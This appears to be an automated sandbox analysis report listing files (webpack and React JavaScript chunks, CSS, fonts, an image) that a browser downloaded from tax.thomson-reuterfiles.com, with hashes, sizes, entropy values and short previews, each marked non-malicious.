                  MD5:75FA40EDDBA53306AD2E634AD1BD5E5D
                  SHA1:F764E73DC771AB69130FAD742B93E45A5B0D368F
                  SHA-256:CC67D35B4F8D98C17C105961CC2F26D8C98457922DF87EE3FB8C08B165BBF097
                  SHA-512:00B2EE38A0DB465890A9B40DCAC8EF122774E32F47A8142D167A35A22FDF9E1FEDEEAF60C6415462A997D033DCD8DCB7818800E360CA1A41CD0A976B7C14F7CB
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[849],{7219:function(t,e,n){n.d(e,{XKb:function(){return FiLink},Imn:function(){return FiMail},IC0:function(){return FiMessageSquare},ViN:function(){return FiPrinter},jRj:function(){return FiSearch}});var r=n(7294),o={color:void 0,size:void 0,className:void 0,style:void 0,attr:void 0},i=r.createContext&&r.createContext(o),__assign=function(){return(__assign=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)},__rest=function(t,e){var n={};for(var r in t)Object.prototype.hasOwnProperty.call(t,r)&&0>e.indexOf(r)&&(n[r]=t[r]);if(null!=t&&"function"==typeof Object.getOwnPropertySymbols)for(var o=0,r=Object.getOwnPropertySymbols(t);o<r.length;o++)0>e.indexOf(r[o])&&Object.prototype.propertyIsEnumerable.call(t,r[o])&&(n[r[o]]=t[r[o]]);return n};function iconBase_GenIcon(t){return function(e){re
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):5118
                  Entropy (8bit):5.42635093571842
                  Encrypted:false
                  SSDEEP:
                  MD5:8283D5A5DEE609F59A5E2D8178FAC306
                  SHA1:33C121F2C64F6BE3535693EEDB43E39C44812FCC
                  SHA-256:EFE2A4309C2E2CF8B24023D7DDD9F65C50F7B2E187CB28C1BD68AC8FD1D88BC6
                  SHA-512:7757CC826335058EB94B682C740ADDABC0424E9A7490833387A8E107CE3DE08F8A7254C05DF6D82A50C4353DC2BE09CA3C34A1704E41B427CF642398E0E43AA0
                  Malicious:false
                  Reputation:unknown
                  URL:"https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap"
                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqauLY1HY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqY-LY1HY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqa-LY1HY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Source Sans 3';. font-styl
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65202)
                  Category:downloaded
                  Size (bytes):141047
                  Entropy (8bit):5.3354666088633245
                  Encrypted:false
                  SSDEEP:
                  MD5:71351D23ECDBFB39CB548F7CB628ECF9
                  SHA1:12811C1FC35D5864974BC4B98A641C037B56B9FC
                  SHA-256:1CD1CCA3AEBCDD10C33D713A95479909354DDBC5D5AD9761466AC27EA528895D
                  SHA-512:7016A1D5DA3B69C5002CB7079CEC48D4A7AB41A3C9DC2EA29D1EA3F236B7DAD83F4380AFFC75C2772D157327F94F6A0F41723B85F5031FF6EB732AD052B279B7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(n,t,a){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var u,i,o,s,w,x,C=a(7294),_=a(3840);function p(n){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+n,a=1;a<arguments.length;a++)t+="&args[]="+encodeURIComponent(arguments[a]);return"Minified React error #"+n+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var N=new Set,z={};function fa(n,t){ha(n,t),ha(n+"Capture",t)}function ha(n,t){for(z[n]=t,n=0;n<t.length;n++)N.add(t[n])}var P=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),j=Object.prototype.hasOwnProperty,U=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.875
                  Encrypted:false
                  SSDEEP:
                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC44ORIZCYl_7RMjcnElEgUNkWGVTiHxs0hN1qpbJw==?alt=proto
                  Preview:CgkKBw2RYZVOGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 3020 x 388, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):135160
                  Entropy (8bit):7.959503731592724
                  Encrypted:false
                  SSDEEP:
                  MD5:8626685AEF425B8F971E7FDB64FACF98
                  SHA1:2F4042AFD5312BCE15757730870ED4ED7ED86F31
                  SHA-256:0467919FBAE3F5AB1B3109BBC941916142A7C68FE16823795F6CB13BC7E936A5
                  SHA-512:E565B4F94019C358610645EC826844A1498F03AD2A86BA962C26847BCCC3A0E1490F21F7ECE24E19E7E26DF4FE64A2E0AFDCE3121E7548080545D61B1E1F7031
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (29860)
                  Category:downloaded
                  Size (bytes):30040
                  Entropy (8bit):5.166885302002284
                  Encrypted:false
                  SSDEEP:
                  MD5:31DE4512A833E5551978867D98FF011C
                  SHA1:CD7032688634A063ED7AF8B36400C61D575742EB
                  SHA-256:B2EDCCC182DDAC5009DB3D04D352201D7833006B9EAE33F5E8ECAFB6FC976FDB
                  SHA-512:7614EC6B5C309E62ED66AB621142E6A8566D8D3B8C8298E5C4E05CD41A272A9715E3E06631CD5047112B85F99F01646902365C3A70EA16202766A72B4BE69AC7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css
                  Preview:@import url("https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap");./*.! tailwindcss v3.3.2 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid #e5e7eb}:after,:before{--tw-content:""}html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-feature-settings:normal;font-variation-settings:normal}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,L
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 39304, version 1.0
                  Category:downloaded
                  Size (bytes):39304
                  Entropy (8bit):7.994120188451945
                  Encrypted:true
                  SSDEEP:
                  MD5:20DCA63D8EE3254B712C7171AE987713
                  SHA1:BFF49469BB0DC3989D8DD4726A85D060396B100F
                  SHA-256:CCAEE6F0BB7DCF2A0EE729096CFBA2CF24EA535E068F6CBFB827F79733F8181D
                  SHA-512:F1678F40E5DC86ACE717DCB33196D31BF2951C36E266419E61580313BEFBC44C049CFC86267A5156C20B561B3ED213807D44A96B8F57EB22E04BD2133CD7AE98
                  Malicious:false
                  Reputation:unknown
                  URL:https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (54551)
                  Category:downloaded
                  Size (bytes):202199
                  Entropy (8bit):5.911594171548854
                  Encrypted:false
                  SSDEEP:
                  MD5:4CBBD1EB0EC89177917AD99F6C68F535
                  SHA1:DD9DF4DFDC929A5193122BBD1C9342CDF59F4FC5
                  SHA-256:BA7D803F2960371F9C72EAC0F1D2C9F2C874216C29470746545A6DB212BFD3CA
                  SHA-512:954EDBDEC7AD7AFA4F89E29C64C803C17F0D1F80122F15BC7B61574A908B0F4ADBD4C2FF8D871C5C8D371CDA5E0E2EDAB6BDA583ED0EC03717BAC476392B243F
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{5687:function(m,R,H){"use strict";function invariant(m,R,H){if(void 0===H&&(H=Error),!m)throw new H(R)}H.d(R,{kG:function(){return invariant}})},5957:function(m,R,H){"use strict";function memoize(m,R){var H=R&&R.cache?R.cache:B,F=R&&R.serializer?R.serializer:serializerDefault;return(R&&R.strategy?R.strategy:function(m,R){var H,B,F=1===m.length?monadic:variadic;return H=R.cache.create(),B=R.serializer,F.bind(this,m,H,B)})(m,{cache:H,serializer:F})}function monadic(m,R,H,B){var F=null==B||"number"==typeof B||"boolean"==typeof B?B:H(B),U=R.get(F);return void 0===U&&(U=m.call(this,B),R.set(F,U)),U}function variadic(m,R,H){var B=Array.prototype.slice.call(arguments,3),F=H(B),U=R.get(F);return void 0===U&&(U=m.apply(this,B),R.set(F,U)),U}H.d(R,{A:function(){return F},H:function(){return memoize}});var serializerDefault=function(){return JSON.stringify(arguments)};function ObjectWithoutPrototypeCache(){this.cache=Object.create(nul
                  No static file info